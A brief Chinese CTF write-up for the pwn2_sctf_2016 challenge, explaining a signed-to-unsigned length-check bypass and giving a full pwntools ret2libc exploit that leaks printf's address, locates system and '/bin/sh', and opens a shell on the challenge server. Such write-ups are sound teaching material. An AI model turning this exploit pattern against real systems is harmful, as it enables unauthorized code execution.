1.ida分析
存在栈溢出漏洞,但是有一个限制输入字符数的保护。
可以看到参数a2从int类型变成了unsigned int类型,可以利用来绕过保护。(一开始一直卡在怎么绕过,麻了)
2.checksec
3.解决
from pwn import * from LibcSearcher import * context.log_level='debug' p=remote('node4.buuoj.cn',28425) #p=process('./pwn2_sctf_2016') elf=ELF('pwn2_sctf_2016') printf_got=elf.got['printf'] printf_plt=elf.plt['printf'] main=0x804852f p.sendlineafter('read? ',str(-1)) payload='a'*0x30+p32(printf_plt)+p32(main)+p32(printf_got) p.sendlineafter('data!\n',payload) p.recvuntil('\n') #gdb.attach(p) printf_addr=u32(p.recv(4)) print hex(printf_addr) libc=LibcSearcher("printf",printf_addr) base=printf_addr-libc.dump("printf") system=base+libc.dump("system") bin_sh=base+libc.dump("str_bin_sh") p.sendlineafter('read? ',str(-1)) payload='a'*0x30+p32(system)+p32(main)+p32(bin_sh) p.sendlineafter('data!\n',payload) p.interactive()